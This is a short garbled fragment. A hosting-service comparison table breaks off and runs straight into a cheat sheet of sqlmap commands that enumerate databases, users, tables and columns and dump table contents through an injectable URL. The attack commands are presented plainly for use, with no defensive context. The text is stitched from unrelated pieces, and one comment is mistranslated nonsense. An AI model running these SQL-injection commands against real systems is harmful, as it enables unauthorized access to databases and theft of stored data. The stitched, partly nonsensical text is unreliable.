See also:
| Service | Type | RAM | Storage | Limitations |
|---|---|---|---|---|
| 👉 Adaptable | PaaS | 256 MB | Non-persistent? (1 GB database storage available) | |
| AWS EC2 | IaaS | 1 GB |
| # Basic usage | |
| ./sqlmap.py -u "inject address" --dbs // enumerate database | |
| ./sqlmap.py -u "inject address" --current-db // current database | |
| ./sqlmap.py -u "inject address" --users // column database user | |
| ./sqlmap.py -u "inject address" --current-user // current user | |
| ./sqlmap.py -u "inject address" --tables -D "database" // enumerate the table name of the database | |
| ./sqlmap.py -u "inject address" --columns -T "table name" -D "database" // get the column name of the table | |
| ./sqlmap.py -u "inject address" --dump -C "field, field" -T "table name" -D "database" // get the data in the table, including the column, is the pants |